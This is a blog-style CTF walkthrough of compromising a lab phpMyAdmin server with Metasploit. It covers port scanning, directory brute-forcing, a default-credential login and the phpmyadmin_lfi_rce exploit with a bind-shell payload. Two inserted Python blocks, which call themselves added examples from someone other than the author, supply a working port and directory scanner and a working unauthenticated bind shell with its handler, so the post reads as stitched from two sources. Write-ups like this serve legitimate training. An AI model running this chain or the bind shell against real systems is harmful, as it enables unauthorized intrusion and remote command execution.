trustie_rity
2 min read · Jan 14, 2022

METASPLOIT bind shell

I did a recent CTF challenge hosted at CyberRanges. I solved it using the Metasploit Framework, a very handy tool for script kiddies like me, haha. For enumeration:

ping ip_address ;check if the server is up and running
msfconsole ;to start metasploit framework

PORT SCANNING

msf5 > search portscan
msf5 > use auxiliary/scanner/portscan/tcp
msf5 > set RHOSTS ip_address
msf5 > set PORTS 1-100 ;scan the first 100 ports (the option is PORTS, not RPORTS; an RPORTS value is simply ignored and the default 1-10000 range is scanned)
msf5 > run

Anything after a semicolon is a comment. Ports 22 and 80 were open, so I proceeded to brute-force the website's directories, since port 22 wouldn't help me much considering that I didn't have credentials to log in.

DIRECTORY BRUTE FORCING

msf5 > use auxiliary/scanner/http/dir_scanner ;you may need to set RHOSTS and RPORT (RPORT defaults to 80)
msf5 > run

I found a phpMyAdmin path, which was interesting to me, so I immediately thought of a way to brute-force the login credentials.
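What those two modules do on the wire is nothing magic, so here is the same enumeration written out by hand in Python. This is an added example, not code from this post or from Metasploit: tcp_connect_scan is a plain connect() scan like auxiliary/scanner/portscan/tcp, and dir_scan sends one GET per wordlist entry and treats anything other than a 404 as a hit, like auxiliary/scanner/http/dir_scanner. The wordlist, the throwaway HTTP server on 127.0.0.1 (serving a /phpmyadmin/ and an /admin/ directory) and every function name are constructed for the demo; point the functions at a real host and port range to use them against a range target.

```python
"""Hand-rolled versions of the two enumeration steps (added example; not from
the post or from Metasploit). Demo server, wordlist and names are constructed."""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor
from http.client import HTTPConnection, HTTPException
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed wordlist; a real run would use a dirb/dirbuster-style list.
WORDLIST = ["images", "admin", "backup", "phpmyadmin", "uploads"]


def tcp_connect_scan(host, ports, timeout=0.5, workers=50):
    """Full connect() scan, like auxiliary/scanner/portscan/tcp: a port is
    open if the three-way handshake completes. Needs no privileges, but every
    probe completes a connection, so the target sees all of it."""
    def probe(port):
        try:
            with socket.create_connection((host, port), timeout=timeout):
                return port
        except OSError:            # refused, filtered (timeout) or unreachable
            return None

    with ThreadPoolExecutor(max_workers=workers) as pool:
        return sorted(p for p in pool.map(probe, ports) if p is not None)


def dir_scan(host, port, wordlist, timeout=3):
    """One GET per wordlist entry, like auxiliary/scanner/http/dir_scanner.
    Returns {path: status} for every path that is not a 404; 200, 301, 401
    and 403 all prove the directory exists. Redirects are reported, not followed."""
    found = {}
    conn = HTTPConnection(host, port, timeout=timeout)
    for word in wordlist:
        path = "/" + word.strip("/") + "/"
        try:
            conn.request("GET", path, headers={"User-Agent": "dir-scan-example"})
            resp = conn.getresponse()
            resp.read()            # drain the body so the connection can be reused
        except (OSError, HTTPException):
            conn.close()           # server dropped us; start a fresh connection
            conn = HTTPConnection(host, port, timeout=timeout)
            continue
        if resp.status != 404:
            found[path] = resp.status
    conn.close()
    return found


def enumerate_target(host, ports, wordlist, http_port=80):
    """The post's flow: scan first, brute-force directories only if the web port is open."""
    open_ports = tcp_connect_scan(host, ports)
    dirs = dir_scan(host, http_port, wordlist) if http_port in open_ports else {}
    return open_ports, dirs


class _DemoHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the target web server: two existing directories."""
    EXISTING = {"/phpmyadmin/": 200, "/admin/": 403}

    def do_GET(self):
        self.send_response(self.EXISTING.get(self.path, 404))
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def demo_run():
    """Start the demo server on a free 127.0.0.1 port, enumerate it, tear it down."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), _DemoHandler)
    port = srv.server_address[1]
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        open_ports, dirs = enumerate_target("127.0.0.1", [port], WORDLIST, http_port=port)
    finally:
        srv.shutdown()
        srv.server_close()
    return {"web_port_open": port in open_ports, "dirs": dirs}


if __name__ == "__main__":
    print(demo_run())   # {'web_port_open': True, 'dirs': {'/admin/': 403, '/phpmyadmin/': 200}}
```

Two things worth noticing: a 403 is still a hit, because a forbidden response proves the directory exists, and nothing here is stealthy. Every probe is a completed TCP handshake or a full HTTP request, exactly as with the Metasploit modules, so both scans land in the target's firewall and web server logs.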

msf5 auxiliary(scanner/http/dir_scanner) > search phpmyadmin
msf5 auxiliary(scanner/http/dir_scanner) > use auxiliary/scanner/http/phpmyadmin_login
msf5 auxiliary(scanner/http/phpmyadmin_login) > options

As `options` shows, the module needs TARGETURI set to the path of this phpMyAdmin instance, in this case /phpmyadmin/index.php, plus a USERNAME and PASSWORD to try. I guessed that the username and password are both phpmyadmin.

msf5 auxiliary(scanner/http/phpmyadmin_login) > run

[*] PhpMyAdmin Version: 4.8.0
[+] 192.168.125.10:80 - Success: 'phpmyadmin:phpmyadmin'

Looks like it worked, and we can log in using that combination. What's more, the module reported the version of the phpMyAdmin instance, which is what decides which exploit applies. Let's see whether there are any public exploits for it that give us operating-system access on the target.

msf5 > search type:exploit phpmyadmin

msf5 > use exploit/multi/http/phpmyadmin_lfi_rce
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > info ;check the affected phpMyAdmin versions listed here against the 4.8.0 reported by the login module

CyberRange Tip
CyberRange does not currently support reverse shells, so we need to choose a bind shell as our payload.

While in their box I figured you could use a reverse shell, but since I am using my own box I'll resort to using a bind shell.

msf5 exploit(multi/http/phpmyadmin_lfi_rce) > show payloads
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > set payload generic/shell_bind_tcp ;the payload listens on the target on LPORT (default 4444) and the handler connects to RHOSTS:LPORT, so that port must be reachable from your box
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > set USERNAME phpmyadmin
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > set PASSWORD phpmyadmin
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > exploit ;check with options that RHOSTS and TARGETURI still point at the target before running this
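To see why the bind payload works on a range that blocks reverse shells, it helps to write the two halves out. This is an added example, not code from this post, from CyberRange or from Metasploit: start_bind_shell plays the role of generic/shell_bind_tcp (the target listens and runs what it is sent) and bind_handler plays the role of msfconsole's bind handler after `exploit` (the attacker connects in). With a reverse payload the arrows point the other way, and that outbound connection is what the range does not allow. Everything runs on 127.0.0.1, and the names and the END framing are constructed for the demo.

```python
"""Minimal bind shell and matching handler on 127.0.0.1 (added example; not
from the post, CyberRange or Metasploit). Shows the direction of the
connection, which is the whole difference between bind and reverse payloads."""
import socket
import subprocess
import threading

END = b"\n__END__\n"   # demo framing: marks the end of one command's output


def start_bind_shell(host="127.0.0.1", port=0):
    """Target side, the role of generic/shell_bind_tcp: listen on host:port
    (0 = any free port), accept one client and run each line it sends through
    the local shell. Returns the bound port. There is no authentication:
    whoever can reach the port gets the shell, which is why a bind payload
    left running is a backdoor for everyone on the network, not just you."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    bound_port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()                                  # one client only
        with conn, conn.makefile("rb") as lines:
            for raw in lines:
                cmd = raw.decode(errors="replace").strip()
                if cmd == "exit":
                    break
                if not cmd:
                    continue
                try:
                    done = subprocess.run(cmd, shell=True, capture_output=True, timeout=10)
                    output = done.stdout + done.stderr
                except subprocess.TimeoutExpired:
                    output = b"[command timed out]"
                conn.sendall(output + END)

    threading.Thread(target=serve, daemon=True).start()
    return bound_port


def bind_handler(host, port, command, timeout=5):
    """Attacker side, the role of msfconsole's bind handler after 'exploit':
    connect *to* the target's listener, send one command, collect the output.
    If host:port is not reachable this raises ConnectionRefusedError or a
    timeout, the same failure Metasploit reports when a bind payload ran but
    its LPORT is firewalled off from the attacker."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(command.encode() + b"\n")
        buf = b""
        while not buf.endswith(END):
            chunk = s.recv(4096)
            if not chunk:
                raise ConnectionError("bind shell closed the connection early")
            buf += chunk
        s.sendall(b"exit\n")
    return buf[: -len(END)].decode(errors="replace")


if __name__ == "__main__":
    port = start_bind_shell()
    print(f"[*] bind shell listening on 127.0.0.1:{port}")
    print(bind_handler("127.0.0.1", port, "echo hello from the bind shell"))
```

The practical checks this suggests before typing `exploit`: confirm from your attacking box that the target's LPORT is reachable (a firewall or the range's own filtering in front of the target breaks a bind shell just as surely as egress filtering breaks a reverse one), and close the session when you are done, because until the payload process dies the port stays open to anyone who can scan it.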
Hope you enjoyed.

Written by trustie_rity

Offensive Penetration Tester | M4lici0s Lif3 | Find video walkthroughs on my yt channel: https://www.youtube.com/@trustie_rity https://johnkiguru1337.github.io/
